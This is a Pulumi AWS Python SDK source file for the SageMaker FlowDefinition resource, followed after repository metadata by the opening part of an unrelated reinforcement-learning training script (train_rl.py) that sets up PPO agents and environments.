tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
Input properties used for looking up and filtering FlowDefinition resources.
:param pulumi.Input[str] arn: The Amazon Resource Name (ARN) assigned by AWS to this Flow Definition.
:param pulumi.Input[str] flow_definition_name: The name of your flow definition.
:param pulumi.Input['FlowDefinitionHumanLoopActivationConfigArgs'] human_loop_activation_config: An object containing information about the events that trigger a human workflow. See Human Loop Activation Config details below.
:param pulumi.Input['FlowDefinitionHumanLoopConfigArgs'] human_loop_config: An object containing information about the tasks the human reviewers will perform. See Human Loop Config details below.
:param pulumi.Input['FlowDefinitionHumanLoopRequestSourceArgs'] human_loop_request_source: Container for configuring the source of human task requests. Use to specify if Amazon Rekognition or Amazon Textract is used as an integration source. See Human Loop Request Source details below.
:param pulumi.Input['FlowDefinitionOutputConfigArgs'] output_config: An object containing information about where the human review results will be uploaded. See Output Config details below.
:param pulumi.Input[str] role_arn: The Amazon Resource Name (ARN) of the role needed to call other services on your behalf.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A map of tags to assign to the resource. If configured with a provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block) present, tags with matching keys will overwrite those defined at the provider-level.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: A map of tags assigned to the resource, including those inherited from the provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block).
"""
if arn is not None:
pulumi.set(__self__, "arn", arn)
if flow_definition_name is not None:
pulumi.set(__self__, "flow_definition_name", flow_definition_name)
if human_loop_activation_config is not None:
pulumi.set(__self__, "human_loop_activation_config", human_loop_activation_config)
if human_loop_config is not None:
pulumi.set(__self__, "human_loop_config", human_loop_config)
if human_loop_request_source is not None:
pulumi.set(__self__, "human_loop_request_source", human_loop_request_source)
if output_config is not None:
pulumi.set(__self__, "output_config", output_config)
if role_arn is not None:
pulumi.set(__self__, "role_arn", role_arn)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if tags_all is not None:
pulumi.set(__self__, "tags_all", tags_all)
@property
@pulumi.getter
def arn(self) -> Optional[pulumi.Input[str]]:
"""
The Amazon Resource Name (ARN) assigned by AWS to this Flow Definition.
"""
return pulumi.get(self, "arn")
@arn.setter
def arn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "arn", value)
@property
@pulumi.getter(name="flowDefinitionName")
def flow_definition_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of your flow definition.
"""
return pulumi.get(self, "flow_definition_name")
@flow_definition_name.setter
def flow_definition_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "flow_definition_name", value)
@property
@pulumi.getter(name="humanLoopActivationConfig")
def human_loop_activation_config(self) -> Optional[pulumi.Input['FlowDefinitionHumanLoopActivationConfigArgs']]:
"""
An object containing information about the events that trigger a human workflow. See Human Loop Activation Config details below.
"""
return pulumi.get(self, "human_loop_activation_config")
@human_loop_activation_config.setter
def human_loop_activation_config(self, value: Optional[pulumi.Input['FlowDefinitionHumanLoopActivationConfigArgs']]):
pulumi.set(self, "human_loop_activation_config", value)
@property
@pulumi.getter(name="humanLoopConfig")
def human_loop_config(self) -> Optional[pulumi.Input['FlowDefinitionHumanLoopConfigArgs']]:
"""
An object containing information about the tasks the human reviewers will perform. See Human Loop Config details below.
"""
return pulumi.get(self, "human_loop_config")
@human_loop_config.setter
def human_loop_config(self, value: Optional[pulumi.Input['FlowDefinitionHumanLoopConfigArgs']]):
pulumi.set(self, "human_loop_config", value)
@property
@pulumi.getter(name="humanLoopRequestSource")
def human_loop_request_source(self) -> Optional[pulumi.Input['FlowDefinitionHumanLoopRequestSourceArgs']]:
"""
Container for configuring the source of human task requests. Use to specify if Amazon Rekognition or Amazon Textract is used as an integration source. See Human Loop Request Source details below.
"""
return pulumi.get(self, "human_loop_request_source")
@human_loop_request_source.setter
def human_loop_request_source(self, value: Optional[pulumi.Input['FlowDefinitionHumanLoopRequestSourceArgs']]):
pulumi.set(self, "human_loop_request_source", value)
@property
@pulumi.getter(name="outputConfig")
def output_config(self) -> Optional[pulumi.Input['FlowDefinitionOutputConfigArgs']]:
"""
An object containing information about where the human review results will be uploaded. See Output Config details below.
"""
return pulumi.get(self, "output_config")
@output_config.setter
def output_config(self, value: Optional[pulumi.Input['FlowDefinitionOutputConfigArgs']]):
pulumi.set(self, "output_config", value)
@property
@pulumi.getter(name="roleArn")
def role_arn(self) -> Optional[pulumi.Input[str]]:
"""
The Amazon Resource Name (ARN) of the role needed to call other services on your behalf.
"""
return pulumi.get(self, "role_arn")
@role_arn.setter
def role_arn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "role_arn", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A map of tags to assign to the resource. If configured with a provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block) present, tags with matching keys will overwrite those defined at the provider-level.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="tagsAll")
def tags_all(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A map of tags assigned to the resource, including those inherited from the provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block).
"""
return pulumi.get(self, "tags_all")
@tags_all.setter
def tags_all(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags_all", value)
class FlowDefinition(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
flow_definition_name: Optional[pulumi.Input[str]] = None,
human_loop_activation_config: Optional[pulumi.Input[pulumi.InputType['FlowDefinitionHumanLoopActivationConfigArgs']]] = None,
human_loop_config: Optional[pulumi.Input[pulumi.InputType['FlowDefinitionHumanLoopConfigArgs']]] = None,
human_loop_request_source: Optional[pulumi.Input[pulumi.InputType['FlowDefinitionHumanLoopRequestSourceArgs']]] = None,
output_config: Optional[pulumi.Input[pulumi.InputType['FlowDefinitionOutputConfigArgs']]] = None,
role_arn: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
"""
Provides a Sagemaker Flow Definition resource.
## Example Usage
### Basic Usage
```python
import pulumi
import pulumi_aws as aws
example = aws.sagemaker.FlowDefinition("example",
flow_definition_name="example",
role_arn=aws_iam_role["example"]["arn"],
human_loop_config=aws.sagemaker.FlowDefinitionHumanLoopConfigArgs(
human_task_ui_arn=aws_sagemaker_human_task_ui["example"]["arn"],
task_availability_lifetime_in_seconds=1,
task_count=1,
task_description="example",
task_title="example",
workteam_arn=aws_sagemaker_workteam["example"]["arn"],
),
output_config=aws.sagemaker.FlowDefinitionOutputConfigArgs(
s3_output_path=f"s3://{aws_s3_bucket['example']['bucket']}/",
))
```
### Public Workteam Usage
```python
import pulumi
import pulumi_aws as aws
example = aws.sagemaker.FlowDefinition("example",
flow_definition_name="example",
role_arn=aws_iam_role["example"]["arn"],
human_loop_config=aws.sagemaker.FlowDefinitionHumanLoopConfigArgs(
human_task_ui_arn=aws_sagemaker_human_task_ui["example"]["arn"],
task_availability_lifetime_in_seconds=1,
task_count=1,
task_description="example",
task_title="example",
workteam_arn=f"arn:aws:sagemaker:{data['aws_region']['current']['name']}:394669845002:workteam/public-crowd/default",
public_workforce_task_price=aws.sagemaker.FlowDefinitionHumanLoopConfigPublicWorkforceTaskPriceArgs(
amount_in_usd=aws.sagemaker.FlowDefinitionHumanLoopConfigPublicWorkforceTaskPriceAmountInUsdArgs(
cents=1,
tenth_fractions_of_a_cent=2,
),
),
),
output_config=aws.sagemaker.FlowDefinitionOutputConfigArgs(
s3_output_path=f"s3://{aws_s3_bucket['example']['bucket']}/",
))
```
### Human Loop Activation Config Usage
```python
import pulumi
import pulumi_aws as aws
example = aws.sagemaker.FlowDefinition("example",
flow_definition_name="example",
role_arn=aws_iam_role["example"]["arn"],
human_loop_config=aws.sagemaker.FlowDefinitionHumanLoopConfigArgs(
human_task_ui_arn=aws_sagemaker_human_task_ui["example"]["arn"],
task_availability_lifetime_in_seconds=1,
task_count=1,
task_description="example",
task_title="example",
workteam_arn=aws_sagemaker_workteam["example"]["arn"],
),
human_loop_request_source=aws.sagemaker.FlowDefinitionHumanLoopRequestSourceArgs(
aws_managed_human_loop_request_source="AWS/Textract/AnalyzeDocument/Forms/V1",
),
human_loop_activation_config=aws.sagemaker.FlowDefinitionHumanLoopActivationConfigArgs(
human_loop_activation_conditions_config=aws.sagemaker.FlowDefinitionHumanLoopActivationConfigHumanLoopActivationConditionsConfigArgs(
human_loop_activation_conditions=\"\"\" {
"Conditions": [
{
"ConditionType": "Sampling",
"ConditionParameters": {
"RandomSamplingPercentage": 5
}
}
]
}
\"\"\",
),
),
output_config=aws.sagemaker.FlowDefinitionOutputConfigArgs(
s3_output_path=f"s3://{aws_s3_bucket['example']['bucket']}/",
))
```
## Import
Sagemaker Flow Definitions can be imported using the `flow_definition_name`, e.g.
```sh
$ pulumi import aws:sagemaker/flowDefinition:FlowDefinition example example
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] flow_definition_name: The name of your flow definition.
:param pulumi.Input[pulumi.InputType['FlowDefinitionHumanLoopActivationConfigArgs']] human_loop_activation_config: An object containing information about the events that trigger a human workflow. See Human Loop Activation Config details below.
:param pulumi.Input[pulumi.InputType['FlowDefinitionHumanLoopConfigArgs']] human_loop_config: An object containing information about the tasks the human reviewers will perform. See Human Loop Config details below.
:param pulumi.Input[pulumi.InputType['FlowDefinitionHumanLoopRequestSourceArgs']] human_loop_request_source: Container for configuring the source of human task requests. Use to specify if Amazon Rekognition or Amazon Textract is used as an integration source. See Human Loop Request Source details below.
:param pulumi.Input[pulumi.InputType['FlowDefinitionOutputConfigArgs']] output_config: An object containing information about where the human review results will be uploaded. See Output Config details below.
:param pulumi.Input[str] role_arn: The Amazon Resource Name (ARN) of the role needed to call other services on your behalf.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A map of tags to assign to the resource. If configured with a provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block) present, tags with matching keys will overwrite those defined at the provider-level.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: A map of tags assigned to the resource, including those inherited from the provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block).
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: FlowDefinitionArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides a Sagemaker Flow Definition resource.
## Example Usage
### Basic Usage
```python
import pulumi
import pulumi_aws as aws
example = aws.sagemaker.FlowDefinition("example",
flow_definition_name="example",
role_arn=aws_iam_role["example"]["arn"],
human_loop_config=aws.sagemaker.FlowDefinitionHumanLoopConfigArgs(
human_task_ui_arn=aws_sagemaker_human_task_ui["example"]["arn"],
task_availability_lifetime_in_seconds=1,
task_count=1,
task_description="example",
task_title="example",
workteam_arn=aws_sagemaker_workteam["example"]["arn"],
),
output_config=aws.sagemaker.FlowDefinitionOutputConfigArgs(
s3_output_path=f"s3://{aws_s3_bucket['example']['bucket']}/",
))
```
### Public Workteam Usage
```python
import pulumi
import pulumi_aws as aws
example = aws.sagemaker.FlowDefinition("example",
flow_definition_name="example",
role_arn=aws_iam_role["example"]["arn"],
human_loop_config=aws.sagemaker.FlowDefinitionHumanLoopConfigArgs(
human_task_ui_arn=aws_sagemaker_human_task_ui["example"]["arn"],
task_availability_lifetime_in_seconds=1,
task_count=1,
task_description="example",
task_title="example",
workteam_arn=f"arn:aws:sagemaker:{data['aws_region']['current']['name']}:394669845002:workteam/public-crowd/default",
public_workforce_task_price=aws.sagemaker.FlowDefinitionHumanLoopConfigPublicWorkforceTaskPriceArgs(
amount_in_usd=aws.sagemaker.FlowDefinitionHumanLoopConfigPublicWorkforceTaskPriceAmountInUsdArgs(
cents=1,
tenth_fractions_of_a_cent=2,
),
),
),
output_config=aws.sagemaker.FlowDefinitionOutputConfigArgs(
s3_output_path=f"s3://{aws_s3_bucket['example']['bucket']}/",
))
```
### Human Loop Activation Config Usage
```python
import pulumi
import pulumi_aws as aws
example = aws.sagemaker.FlowDefinition("example",
flow_definition_name="example",
role_arn=aws_iam_role["example"]["arn"],
human_loop_config=aws.sagemaker.FlowDefinitionHumanLoopConfigArgs(
human_task_ui_arn=aws_sagemaker_human_task_ui["example"]["arn"],
task_availability_lifetime_in_seconds=1,
task_count=1,
task_description="example",
task_title="example",
workteam_arn=aws_sagemaker_workteam["example"]["arn"],
),
human_loop_request_source=aws.sagemaker.FlowDefinitionHumanLoopRequestSourceArgs(
aws_managed_human_loop_request_source="AWS/Textract/AnalyzeDocument/Forms/V1",
),
human_loop_activation_config=aws.sagemaker.FlowDefinitionHumanLoopActivationConfigArgs(
human_loop_activation_conditions_config=aws.sagemaker.FlowDefinitionHumanLoopActivationConfigHumanLoopActivationConditionsConfigArgs(
human_loop_activation_conditions=\"\"\" {
"Conditions": [
{
"ConditionType": "Sampling",
"ConditionParameters": {
"RandomSamplingPercentage": 5
}
}
]
}
\"\"\",
),
),
output_config=aws.sagemaker.FlowDefinitionOutputConfigArgs(
s3_output_path=f"s3://{aws_s3_bucket['example']['bucket']}/",
))
```
## Import
Sagemaker Flow Definitions can be imported using the `flow_definition_name`, e.g.
```sh
$ pulumi import aws:sagemaker/flowDefinition:FlowDefinition example example
```
:param str resource_name: The name of the resource.
:param FlowDefinitionArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(FlowDefinitionArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
flow_definition_name: Optional[pulumi.Input[str]] = None,
human_loop_activation_config: Optional[pulumi.Input[pulumi.InputType['FlowDefinitionHumanLoopActivationConfigArgs']]] = None,
human_loop_config: Optional[pulumi.Input[pulumi.InputType['FlowDefinitionHumanLoopConfigArgs']]] = None,
human_loop_request_source: Optional[pulumi.Input[pulumi.InputType['FlowDefinitionHumanLoopRequestSourceArgs']]] = None,
output_config: Optional[pulumi.Input[pulumi.InputType['FlowDefinitionOutputConfigArgs']]] = None,
role_arn: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = FlowDefinitionArgs.__new__(FlowDefinitionArgs)
if flow_definition_name is None and not opts.urn:
raise TypeError("Missing required property 'flow_definition_name'")
__props__.__dict__["flow_definition_name"] = flow_definition_name
__props__.__dict__["human_loop_activation_config"] = human_loop_activation_config
if human_loop_config is None and not opts.urn:
raise TypeError("Missing required property 'human_loop_config'")
__props__.__dict__["human_loop_config"] = human_loop_config
__props__.__dict__["human_loop_request_source"] = human_loop_request_source
if output_config is None and not opts.urn:
raise TypeError("Missing required property 'output_config'")
__props__.__dict__["output_config"] = output_config
if role_arn is None and not opts.urn:
raise TypeError("Missing required property 'role_arn'")
__props__.__dict__["role_arn"] = role_arn
__props__.__dict__["tags"] = tags
__props__.__dict__["tags_all"] = tags_all
__props__.__dict__["arn"] = None
super(FlowDefinition, __self__).__init__(
'aws:sagemaker/flowDefinition:FlowDefinition',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
arn: Optional[pulumi.Input[str]] = None,
flow_definition_name: Optional[pulumi.Input[str]] = None,
human_loop_activation_config: Optional[pulumi.Input[pulumi.InputType['FlowDefinitionHumanLoopActivationConfigArgs']]] = None,
human_loop_config: Optional[pulumi.Input[pulumi.InputType['FlowDefinitionHumanLoopConfigArgs']]] = None,
human_loop_request_source: Optional[pulumi.Input[pulumi.InputType['FlowDefinitionHumanLoopRequestSourceArgs']]] = None,
output_config: Optional[pulumi.Input[pulumi.InputType['FlowDefinitionOutputConfigArgs']]] = None,
role_arn: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None) -> 'FlowDefinition':
"""
Get an existing FlowDefinition resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] arn: The Amazon Resource Name (ARN) assigned by AWS to this Flow Definition.
:param pulumi.Input[str] flow_definition_name: The name of your flow definition.
:param pulumi.Input[pulumi.InputType['FlowDefinitionHumanLoopActivationConfigArgs']] human_loop_activation_config: An object containing information about the events that trigger a human workflow. See Human Loop Activation Config details below.
:param pulumi.Input[pulumi.InputType['FlowDefinitionHumanLoopConfigArgs']] human_loop_config: An object containing information about the tasks the human reviewers will perform. See Human Loop Config details below.
:param pulumi.Input[pulumi.InputType['FlowDefinitionHumanLoopRequestSourceArgs']] human_loop_request_source: Container for configuring the source of human task requests. Use to specify if Amazon Rekognition or Amazon Textract is used as an integration source. See Human Loop Request Source details below.
:param pulumi.Input[pulumi.InputType['FlowDefinitionOutputConfigArgs']] output_config: An object containing information about where the human review results will be uploaded. See Output Config details below.
:param pulumi.Input[str] role_arn: The Amazon Resource Name (ARN) of the role needed to call other services on your behalf.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A map of tags to assign to the resource. If configured with a provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block) present, tags with matching keys will overwrite those defined at the provider-level.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: A map of tags assigned to the resource, including those inherited from the provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block).
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _FlowDefinitionState.__new__(_FlowDefinitionState)
__props__.__dict__["arn"] = arn
__props__.__dict__["flow_definition_name"] = flow_definition_name
__props__.__dict__["human_loop_activation_config"] = human_loop_activation_config
__props__.__dict__["human_loop_config"] = human_loop_config
__props__.__dict__["human_loop_request_source"] = human_loop_request_source
__props__.__dict__["output_config"] = output_config
__props__.__dict__["role_arn"] = role_arn
__props__.__dict__["tags"] = tags
__props__.__dict__["tags_all"] = tags_all
return FlowDefinition(resource_name, opts=opts, __props__=__props__)
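    # Editor's note -- usage sketch (the resource name and ID below are
    # hypothetical, not taken from the provider docs): adopting an
    # already-created flow definition into a program via get():
    #
    #     existing = FlowDefinition.get("imported-example", id="example")
    #     pulumi.export("flow_arn", existing.arn)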
@property
@pulumi.getter
def arn(self) -> pulumi.Output[str]:
"""
The Amazon Resource Name (ARN) assigned by AWS to this Flow Definition.
"""
return pulumi.get(self, "arn")
@property
@pulumi.getter(name="flowDefinitionName")
def flow_definition_name(self) -> pulumi.Output[str]:
"""
The name of your flow definition.
"""
return pulumi.get(self, "flow_definition_name")
@property
@pulumi.getter(name="humanLoopActivationConfig")
def human_loop_activation_config(self) -> pulumi.Output[Optional['outputs.FlowDefinitionHumanLoopActivationConfig']]:
"""
An object containing information about the events that trigger a human workflow. See Human Loop Activation Config details below.
"""
return pulumi.get(self, "human_loop_activation_config")
@property
@pulumi.getter(name="humanLoopConfig")
def human_loop_config(self) -> pulumi.Output['outputs.FlowDefinitionHumanLoopConfig']:
"""
An object containing information about the tasks the human reviewers will perform. See Human Loop Config details below.
"""
return pulumi.get(self, "human_loop_config")
@property
@pulumi.getter(name="humanLoopRequestSource")
def human_loop_request_source(self) -> pulumi.Output[Optional['outputs.FlowDefinitionHumanLoopRequestSource']]:
"""
Container for configuring the source of human task requests. Use to specify if Amazon Rekognition or Amazon Textract is used as an integration source. See Human Loop Request Source details below.
"""
return pulumi.get(self, "human_loop_request_source")
@property
@pulumi.getter(name="outputConfig")
def output_config(self) -> pulumi.Output['outputs.FlowDefinitionOutputConfig']:
"""
An object containing information about where the human review results will be uploaded. See Output Config details below.
"""
return pulumi.get(self, "output_config")
@property
@pulumi.getter(name="roleArn")
def role_arn(self) -> pulumi.Output[str]:
"""
The Amazon Resource Name (ARN) of the role needed to call other services on your behalf.
"""
return pulumi.get(self, "role_arn")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
A map of tags to assign to the resource. If configured with a provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block) present, tags with matching keys will overwrite those defined at the provider-level.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter(name="tagsAll")
def tags_all(self) -> pulumi.Output[Mapping[str, str]]:
"""
A map of tags assigned to the resource, including those inherited from the provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block).
"""
return pulumi.get(self, "tags_all")
| 55.259574
| 348
| 0.686252
|
a39e1904b8eeb1d7214e8498ece1b591e435802b
| 22,656
|
py
|
Python
|
scripts/train_rl.py
|
joel99/midlevel-reps
|
f0b4a4d8ccf09a0488cd18af24723172aff99446
|
[
"MIT"
] | 120
|
2019-04-22T04:45:28.000Z
|
2022-03-23T01:53:17.000Z
|
scripts/train_rl.py
|
joel99/midlevel-reps
|
f0b4a4d8ccf09a0488cd18af24723172aff99446
|
[
"MIT"
] | 14
|
2019-06-12T08:21:21.000Z
|
2021-08-25T15:36:58.000Z
|
scripts/train_rl.py
|
joel99/midlevel-reps
|
f0b4a4d8ccf09a0488cd18af24723172aff99446
|
[
"MIT"
] | 19
|
2019-06-19T07:00:36.000Z
|
2022-03-24T07:18:30.000Z
|
# train_rl.py
# Authors: Sasha Sax (1,3), Bradley Emi (2), Jeffrey Zhang (1) -- UC Berkeley, FAIR, Stanford VL
# Desc: Train or test an agent using PPO.
# Usage:
# python -m scripts.train_rl DIRECTORY_TO_SAVE_RESULTS run_training with uuid=EXP_UUID [CFG1 ...] [cfg.SUB_CFG1.PROPERTY1 ...]
# Notes:
# (i) must be run from parent directory (top-level of git)
# (ii) currently, a visdom instance MUST be used or the script will fail. Defaults to localhost.
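#   Illustrative invocation (editor's sketch; the uuid and override values are
#   hypothetical -- any cfg.* key defined by the configs/ modules loaded below works):
#   python -m scripts.train_rl /tmp/rl_results run_training with uuid=my_experiment \
#          cfg.env.num_processes=4 cfg.saving.visdom_server=localhost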
import sys
import shutil
import copy
import glob
from gym import logger
from gym import spaces
import gym
import json
import logging
import numpy as np
import os
import pprint
import random
import runpy
import sacred
import subprocess
import time
import torch
import torchvision.utils
from evkit.env.wrappers import ProcessObservationWrapper
from evkit.env import EnvFactory
from evkit.models.architectures import AtariNet, TaskonomyFeaturesOnlyNet
from evkit.models.taskonomy_network import TaskonomyNetwork
from evkit.models.actor_critic_module import NaivelyRecurrentACModule
from evkit.preprocess.transforms import rescale_centercrop_resize, rescale, grayscale_rescale, cross_modal_transform, identity_transform, rescale_centercrop_resize_collated, map_pool_collated, map_pool, taskonomy_features_transform, image_to_input_collated, taskonomy_multi_features_transform
from evkit.preprocess.baseline_transforms import blind, pixels_as_state
from evkit.preprocess import TransformFactory
import evkit.rl.algo
from evkit.rl.policy import Policy, PolicyWithBase, BackoutPolicy
from evkit.rl.storage import RolloutSensorDictStorage, RolloutSensorDictReplayBuffer, StackedSensorDictStorage
from evkit.saving.checkpoints import checkpoint_name, save_checkpoint, last_archived_run
from evkit.saving.observers import FileStorageObserverWithExUuid
from evkit.utils.misc import Bunch, cfg_to_md, compute_weight_norm, is_interactive, remove_whitespace, update_dict_deepcopy
import evkit.utils.logging
from evkit.utils.random import set_seed
import tnt.torchnet as tnt
# Set up experiment using SACRED
ex = sacred.Experiment(name="RL Training", interactive=is_interactive())
LOG_DIR = sys.argv[1].strip()
sys.argv.pop(1)
runpy.run_module('configs.core', init_globals=globals())
runpy.run_module('configs.image_architectures', init_globals=globals())
runpy.run_module('configs.habitat', init_globals=globals())
runpy.run_module('configs.gibson', init_globals=globals())
runpy.run_module('configs.doom', init_globals=globals())
logging.basicConfig(level=logging.DEBUG, format='%(message)s')
logger = logging.getLogger()
def log_input_images(obs_unpacked, mlog, num_stack, key_names=['map'], meter_name='debug/input_images', step_num=0):
# Plots the observations from the first process
stacked = []
for key_name in key_names:
if key_name not in obs_unpacked:
logger.debug(key_name, "not found")
continue
obs = obs_unpacked[key_name][0]
obs = (obs + 1.0) / 2.0
obs_chunked = list(torch.chunk(obs, num_stack, dim=0))
key_stacked = torchvision.utils.make_grid(obs_chunked, nrow=num_stack, padding=2)
stacked.append(key_stacked)
stacked = torch.cat(stacked, dim=1)
mlog.update_meter(stacked, meters={meter_name})
mlog.reset_meter(step_num, meterlist={meter_name})
@ex.main
def run_training(cfg, uuid):
try:
logger.info("Running with configuration:\n" + pprint.pformat(cfg))
torch.set_num_threads(1)
set_seed(cfg['training']['seed'])
# get new output_dir name (use for checkpoints)
old_log_dir = cfg['saving']['log_dir']
changed_log_dir = False
existing_log_paths = []
if os.path.exists(old_log_dir) and cfg['saving']['autofix_log_dir']:
LOG_DIR, existing_log_paths = evkit.utils.logging.unused_dir_name(old_log_dir)
os.makedirs(LOG_DIR, exist_ok=False)
cfg['saving']['log_dir'] = LOG_DIR
cfg['saving']['results_log_file'] = os.path.join(LOG_DIR, 'result_log.pkl')
cfg['saving']['reward_log_file'] = os.path.join(LOG_DIR, 'rewards.pkl')
cfg['saving']['visdom_log_file'] = os.path.join(LOG_DIR, 'visdom_logs.json')
changed_log_dir = True
# Load checkpoint, config, agent
agent = None
if cfg['training']['resumable']:
if cfg['saving']['checkpoint']:
prev_run_path = cfg['saving']['checkpoint']
ckpt_fpath = os.path.join(prev_run_path, 'checkpoints', 'ckpt-latest.dat')
if cfg['saving']['checkpoint_configs']: # update configs with values from ckpt
prev_run_metadata_paths = [ os.path.join(prev_run_path, f)
for f in os.listdir(prev_run_path)
if f.endswith('metadata')]
prev_run_config_path = os.path.join(prev_run_metadata_paths[0], 'config.json')
with open(prev_run_config_path) as f:
config = json.load(f) # keys are ['cfg', 'uuid', 'seed']
cfg = update_dict_deepcopy(cfg, config['cfg'])
uuid = config['uuid']
logger.warning("Reusing config from {}".format(prev_run_config_path))
if ckpt_fpath is not None and os.path.exists(ckpt_fpath):
checkpoint_obj = torch.load(ckpt_fpath)
start_epoch = checkpoint_obj['epoch']
logger.info("Loaded learner (epoch {}) from {}".format(start_epoch, ckpt_fpath))
agent = checkpoint_obj['agent']
actor_critic = agent.actor_critic
else:
logger.warning("No checkpoint found at {}".format(ckpt_fpath))
# Make environment
simulator, scenario = cfg['env']['env_name'].split('_')
if cfg['env']['transform_fn_pre_aggregation'] is None:
cfg['env']['transform_fn_pre_aggregation'] = "None"
envs = EnvFactory.vectorized(
cfg['env']['env_name'],
cfg['training']['seed'],
cfg['env']['num_processes'],
cfg['saving']['log_dir'],
cfg['env']['add_timestep'],
env_specific_kwargs = cfg['env']['env_specific_kwargs'],
num_val_processes = cfg['env']['num_val_processes'],
preprocessing_fn = eval(cfg['env']['transform_fn_pre_aggregation']),
addl_repeat_count = cfg['env']['additional_repeat_count'],
sensors = cfg['env']['sensors'],
vis_interval = cfg['saving']['vis_interval'],
visdom_server = cfg['saving']['visdom_server'],
visdom_port = cfg['saving']['visdom_port'],
visdom_log_file = cfg['saving']['visdom_log_file'],
visdom_name = uuid)
if 'transform_fn_post_aggregation' in cfg['env'] and cfg['env']['transform_fn_post_aggregation'] is not None:
transform, space = eval(cfg['env']['transform_fn_post_aggregation'])(envs.observation_space)
envs = ProcessObservationWrapper(envs, transform, space)
is_habitat_env = (simulator == 'Habitat')
action_space = envs.action_space
observation_space = envs.observation_space
retained_obs_shape = { k: v.shape
for k, v in observation_space.spaces.items()
if k in cfg['env']['sensors']}
logger.info(f"Action space: {action_space}")
logger.info(f"Observation space: {observation_space}")
logger.info("Retaining: {}".format(set(observation_space.spaces.keys()).intersection(cfg['env']['sensors'].keys())))
# Finish setting up the agent
        if agent is None:
perception_model = eval(cfg['learner']['perception_network'])(
cfg['learner']['num_stack'],
**cfg['learner']['perception_network_kwargs'])
base = NaivelyRecurrentACModule(
perception_unit=perception_model,
use_gru=cfg['learner']['recurrent_policy'],
internal_state_size=cfg['learner']['internal_state_size'])
actor_critic = PolicyWithBase(
base, action_space,
num_stack=cfg['learner']['num_stack'],
takeover=None)
if cfg['learner']['use_replay']:
agent = evkit.rl.algo.PPOReplay(actor_critic,
cfg['learner']['clip_param'],
cfg['learner']['ppo_epoch'],
cfg['learner']['num_mini_batch'],
cfg['learner']['value_loss_coef'],
cfg['learner']['entropy_coef'],
cfg['learner']['on_policy_epoch'],
cfg['learner']['off_policy_epoch'],
lr=cfg['learner']['lr'],
eps=cfg['learner']['eps'],
max_grad_norm=cfg['learner']['max_grad_norm'])
